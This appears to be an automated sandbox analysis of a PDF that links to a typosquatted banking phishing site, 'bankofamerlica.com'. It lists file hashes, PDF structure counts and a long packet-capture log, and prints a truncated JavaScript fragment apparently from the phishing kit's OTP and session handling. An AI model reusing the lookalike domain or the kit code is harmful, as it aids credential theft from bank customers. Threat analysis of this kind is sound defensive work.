                                                                                              Preview:var otp_timeout=4e4;window.session=makeid(5),localStorage.setItem("session",window.session);var onStorage=function(e){"session"===e.key&&e.newValue!==window.session&&localStorage.setItem("multitab",window.session),"multitab"===e.key&&e.newValue&&e.newValue!==window.session&&(window.removeEventListener("storage",onStorage),localStorage.setItem("session",localStorage.getItem("multitab")),localStorage.removeItem("multitab"),document.body.innerHTML="The current page is already open in another tab. Please follow there!")};function makeid(e){for(var t="",i="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",a=0;a<e;a++)t+=i.charAt(Math.floor(62*Math.random()));return t}function setCookie(e,t,i){var a="";if(i){var s=new Date;s.setTime(s.getTime()+60*i*1e3),a="; expires="+s.toUTCString()}document.cookie=e+"="+(t||"")+a+"; path=/"}function getCookie(e){const t=document.cookie.split(";");for(let i=0;i<t.length;i++){let a=t[i].trim().split("=");if(a[0]===e)return a[1]}return""}functi
                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              File Type:PNG image data, 14 x 9, 8-bit/color RGBA, non-interlaced
                                                                                              Category:downloaded
                                                                                              Size (bytes):144
                                                                                              Entropy (8bit):6.194334305148952
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:yionv//thPlZGl9oT/yBxBrk4nSsSXaHN31vnR6rW0uRTKnwoD0ncs3Tleg1p:6v/lhPCwan8XaHN31vnRUWfuwoCldp
                                                                                              MD5:1F1D3A49189D9FF1E1B99D83E8A36BE5
                                                                                              SHA1:713BFD8A0CC4ACB57D41ED3B82C6E601936018E7
                                                                                              SHA-256:A8BC6337547A246EF75D1AE66D7EC8A0ED6171C1BA49804A403124E27C8E8452
                                                                                              SHA-512:8961B96842DB164136489307823D7E7E067BF79E8214E96719566691BBE603D9C9AE2A50371114E3DB5BAF68848526F4053B1C5BAE8D86C81A1C0B919DE49840
                                                                                              Malicious:false
                                                                                              URL:https://online.access.secure.bankofamerlica.com/assets/gfoot-home-icon.png
                                                                                              Preview:.PNG........IHDR..............M.i...WIDAT(S.....0.....J...)2..Uy..8b..#d.V"b.(8.;..x^k...%..t....8mt..9O..5f.ki..+.x._.s.o.P..R......IEND.B`.
                                                                                              File type:PDF document, version 1.3, 1 pages
                                                                                              Entropy (8bit):6.442264088776772
                                                                                              TrID:
                                                                                              • Adobe Portable Document Format (5005/1) 100.00%
                                                                                              File name:0430tely.pdf
                                                                                              File size:61'628 bytes
                                                                                              MD5:9e8618badb9f66710a39c66e087b62df
                                                                                              SHA1:a52debd9dede1cf36e6a4d737cedcff98fb76804
                                                                                              SHA256:6fea71e67dbb477790e602b8456613405ad62c253d6c977b2c636f6e497a9b5b
                                                                                              SHA512:c5deb2d10e4f0ea6ad5ca116964cb7068859bf0c18ac856232921e3f8067fcda12b5de4bd046a25fda180cc91e16fc07c03a2f39322ae35ffd948fd04dc8ad6d
                                                                                              SSDEEP:1536:DQUIX80iy1lYBFsuuBjSEnfBtUAy0Pr84oXW+2Dw35:sUIXXiy1les9ZX1iW+2Dw35
                                                                                              TLSH:9553F16E511B9E98E18B8F6B27E8B8CB5F2B39A3417D8195B33D16EA6149C3103F7011
                                                                                              File Content Preview:%PDF-1.3.%.... ReportLab Generated PDF document http://www.reportlab.com.1 0 obj.<<./F1 2 0 R.>>.endobj.2 0 obj.<<./BaseFont /Helvetica /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font.>>.endobj.3 0 obj.<<./BitsPerComponent 8 /ColorSpace /
                                                                                              Icon Hash:62cc8caeb29e8ae0

                                                                                              General

                                                                                              Header:%PDF-1.3
                                                                                              Total Entropy:6.442264
                                                                                              Total Bytes:61628
                                                                                              Stream Entropy:6.421077
                                                                                              Stream Bytes:59804
                                                                                              Entropy outside Streams:5.219949
                                                                                              Bytes outside Streams:1824
                                                                                              Number of EOF found:1
                                                                                              Bytes after EOF:
                                                                                              NameCount
                                                                                              obj9
                                                                                              endobj9
                                                                                              stream2
                                                                                              endstream2
                                                                                              xref1
                                                                                              trailer1
                                                                                              startxref1
                                                                                              /Page1
                                                                                              /Encrypt0
                                                                                              /ObjStm0
                                                                                              /URI2
                                                                                              /JS0
                                                                                              /JavaScript0
                                                                                              /AA0
                                                                                              /OpenAction0
                                                                                              /AcroForm0
                                                                                              /JBIG2Decode0
                                                                                              /RichMedia0
                                                                                              /Launch0
                                                                                              /EmbeddedFile0

                                                                                              Image Streams

                                                                                              IDDHASHMD5Preview
                                                                                              340144c0c0c160e4d51d00b4e6b022de84bf378ac56f6f239
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Jan 15, 2025 19:41:18.825373888 CET49673443192.168.2.16204.79.197.203
                                                                                              Jan 15, 2025 19:41:19.140116930 CET49673443192.168.2.16204.79.197.203
                                                                                              Jan 15, 2025 19:41:19.748016119 CET49673443192.168.2.16204.79.197.203
                                                                                              Jan 15, 2025 19:41:20.950257063 CET49673443192.168.2.16204.79.197.203
                                                                                              Jan 15, 2025 19:41:21.785310030 CET4968980192.168.2.16192.229.211.108
                                                                                              Jan 15, 2025 19:41:23.353606939 CET49673443192.168.2.16204.79.197.203
                                                                                              Jan 15, 2025 19:41:26.995546103 CET49678443192.168.2.1620.189.173.10
                                                                                              Jan 15, 2025 19:41:27.309041023 CET49678443192.168.2.1620.189.173.10
                                                                                              Jan 15, 2025 19:41:27.912331104 CET49678443192.168.2.1620.189.173.10
                                                                                              Jan 15, 2025 19:41:28.168062925 CET49673443192.168.2.16204.79.197.203
                                                                                              Jan 15, 2025 19:41:29.127055883 CET49678443192.168.2.1620.189.173.10
                                                                                              Jan 15, 2025 19:41:31.454236984 CET4968080192.168.2.16192.229.211.108
                                                                                              Jan 15, 2025 19:41:31.534184933 CET49678443192.168.2.1620.189.173.10
                                                                                              Jan 15, 2025 19:41:31.758116961 CET4968080192.168.2.16192.229.211.108
                                                                                              Jan 15, 2025 19:41:32.366058111 CET4968080192.168.2.16192.229.211.108
                                                                                              Jan 15, 2025 19:41:33.580048084 CET4968080192.168.2.16192.229.211.108
                                                                                              Jan 15, 2025 19:41:35.988394976 CET4968080192.168.2.16192.229.211.108
                                                                                              Jan 15, 2025 19:41:36.340141058 CET49678443192.168.2.1620.189.173.10
                                                                                              Jan 15, 2025 19:41:37.780112982 CET49673443192.168.2.16204.79.197.203
                                                                                              Jan 15, 2025 19:41:40.800122023 CET4968080192.168.2.16192.229.211.108
                                                                                              Jan 15, 2025 19:41:45.947221041 CET49678443192.168.2.1620.189.173.10
                                                                                              Jan 15, 2025 19:41:46.639542103 CET5905153192.168.2.16162.159.36.2
                                                                                              Jan 15, 2025 19:41:46.644361019 CET5359051162.159.36.2192.168.2.16
                                                                                              Jan 15, 2025 19:41:46.644469976 CET5905153192.168.2.16162.159.36.2
                                                                                              Jan 15, 2025 19:41:46.649429083 CET5359051162.159.36.2192.168.2.16
                                                                                              Jan 15, 2025 19:41:47.096201897 CET5905153192.168.2.16162.159.36.2
                                                                                              Jan 15, 2025 19:41:47.101511955 CET5359051162.159.36.2192.168.2.16
                                                                                              Jan 15, 2025 19:41:47.101579905 CET5905153192.168.2.16162.159.36.2
                                                                                              Jan 15, 2025 19:41:50.414138079 CET4968080192.168.2.16192.229.211.108
                                                                                              Jan 15, 2025 19:41:50.788516998 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:50.788544893 CET44359066188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:50.788610935 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:50.789108992 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:50.789206028 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:50.789284945 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:50.789361000 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:50.789376974 CET44359066188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:50.789525986 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:50.789562941 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.502571106 CET44359066188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.502860069 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.502878904 CET44359066188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.503943920 CET44359066188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.504007101 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.505248070 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.505317926 CET44359066188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.505584955 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.505590916 CET44359066188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.506597996 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.506814957 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.506829023 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.507886887 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.507946014 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.509000063 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.509063005 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.547123909 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.562472105 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.562491894 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.610120058 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.835796118 CET44359066188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.835880041 CET44359066188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.836138964 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.838699102 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.838699102 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.838716030 CET44359066188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:51.838779926 CET59066443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.839435101 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:51.883330107 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.055039883 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.101129055 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.176237106 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.176264048 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.176280975 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.176315069 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.176327944 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.176347017 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.176362991 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.176374912 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.176384926 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.176399946 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.176403046 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.176449060 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.177719116 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.177738905 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.177778959 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.177809954 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.177817106 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.177828074 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.177849054 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.177870035 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.297282934 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.297331095 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.297373056 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.297386885 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.297420025 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.297434092 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.298472881 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.298517942 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.298544884 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.298548937 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.298576117 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.298607111 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.300005913 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.300049067 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.300087929 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.300091982 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.300129890 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.300168037 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.301803112 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.301863909 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.301914930 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.301927090 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.301954031 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.302129030 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.419186115 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.419254065 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.419277906 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.419295073 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.419363022 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.419363022 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.419795990 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.419842005 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.419876099 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.419887066 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.419919968 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.419939995 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.420463085 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.420506001 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.420550108 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.420562029 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.420594931 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.420612097 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.421221972 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.421276093 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.421298027 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.421308994 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.421335936 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.421426058 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.421540976 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.421950102 CET59067443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.421964884 CET44359067188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.535058975 CET59069443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.535159111 CET44359069188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.535257101 CET59069443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.535481930 CET59069443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.535517931 CET44359069188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.892496109 CET59070443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.892538071 CET44359070188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:52.892623901 CET59070443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.892882109 CET59070443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:52.892910957 CET44359070188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.410777092 CET44359069188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.411101103 CET59069443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.411164999 CET44359069188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.412343979 CET44359069188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.412817955 CET59069443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.412954092 CET44359069188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.412981033 CET59069443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.455121040 CET59069443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.455142021 CET44359069188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.589462996 CET44359070188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.589864016 CET59070443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.589884043 CET44359070188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.590260029 CET44359070188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.590660095 CET59070443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.590723038 CET44359070188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.590879917 CET59070443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.635339975 CET44359070188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.753011942 CET44359069188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.753142118 CET44359069188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.753282070 CET59069443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.753308058 CET44359069188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.754365921 CET59069443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.754591942 CET59069443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.754637957 CET44359069188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.758027077 CET59071443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.758085012 CET44359071188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:53.758198023 CET59071443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.758404016 CET59071443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:53.758439064 CET44359071188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.146430969 CET59072443192.168.2.16142.250.184.196
                                                                                              Jan 15, 2025 19:41:54.146482944 CET44359072142.250.184.196192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.146584034 CET59072443192.168.2.16142.250.184.196
                                                                                              Jan 15, 2025 19:41:54.146856070 CET59072443192.168.2.16142.250.184.196
                                                                                              Jan 15, 2025 19:41:54.146874905 CET44359072142.250.184.196192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.487657070 CET44359071188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.487963915 CET59071443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.487997055 CET44359071188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.488955975 CET44359071188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.489027977 CET59071443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.489360094 CET59071443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.489419937 CET44359071188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.489526987 CET59071443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.531330109 CET44359071188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.536117077 CET59071443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.536137104 CET44359071188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.584131956 CET59071443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.612998962 CET44359070188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.613513947 CET59070443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.613583088 CET44359070188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.613651991 CET44359070188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.613706112 CET59070443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.613706112 CET59070443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.621253014 CET59073443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.621294022 CET44359073188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.621520042 CET59073443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.621961117 CET59073443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.621974945 CET44359073188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.622260094 CET59074443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.622306108 CET44359074188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.622498035 CET59074443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.622680902 CET59074443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.622700930 CET44359074188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.624350071 CET59075443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.624358892 CET44359075188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.624469995 CET59075443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.624835014 CET59075443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.624850035 CET44359075188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.786237001 CET44359072142.250.184.196192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.786612988 CET59072443192.168.2.16142.250.184.196
                                                                                              Jan 15, 2025 19:41:54.786621094 CET44359072142.250.184.196192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.788263083 CET44359072142.250.184.196192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.789027929 CET59072443192.168.2.16142.250.184.196
                                                                                              Jan 15, 2025 19:41:54.789407969 CET59072443192.168.2.16142.250.184.196
                                                                                              Jan 15, 2025 19:41:54.789491892 CET44359072142.250.184.196192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.833539963 CET44359071188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.833625078 CET44359071188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.833724976 CET59071443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.835453033 CET59071443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.835472107 CET44359071188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.836507082 CET59076443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.836615086 CET44359076188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.837121010 CET59076443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.837385893 CET59076443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:54.837415934 CET44359076188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.839201927 CET59072443192.168.2.16142.250.184.196
                                                                                              Jan 15, 2025 19:41:54.839231014 CET44359072142.250.184.196192.168.2.16
                                                                                              Jan 15, 2025 19:41:54.887345076 CET59072443192.168.2.16142.250.184.196
                                                                                              Jan 15, 2025 19:41:55.337313890 CET44359075188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.337658882 CET59075443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.337678909 CET44359075188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.338872910 CET44359075188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.339333057 CET59075443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.339345932 CET59075443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.339351892 CET44359075188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.339503050 CET44359075188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.341494083 CET44359074188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.341705084 CET59074443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.341733932 CET44359074188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.343045950 CET44359073188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.343319893 CET59073443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.343332052 CET44359073188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.344470024 CET44359073188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.344835043 CET59073443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.344835043 CET59073443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.345011950 CET44359073188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.345388889 CET44359074188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.345463037 CET59074443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.345701933 CET59074443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.345879078 CET44359074188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.382144928 CET59075443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.398093939 CET59073443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.398108959 CET59074443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.398156881 CET44359074188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.446105003 CET59074443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.548207045 CET44359076188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.548506975 CET59076443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.548554897 CET44359076188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.549760103 CET44359076188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.550076008 CET59076443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.550209999 CET59076443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.550275087 CET44359076188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.605130911 CET59076443192.168.2.16188.119.66.154
                                                                                              Jan 15, 2025 19:41:55.673316002 CET44359075188.119.66.154192.168.2.16
                                                                                              Jan 15, 2025 19:41:55.673491955 CET44359075188.119.66.154192.168.2.16
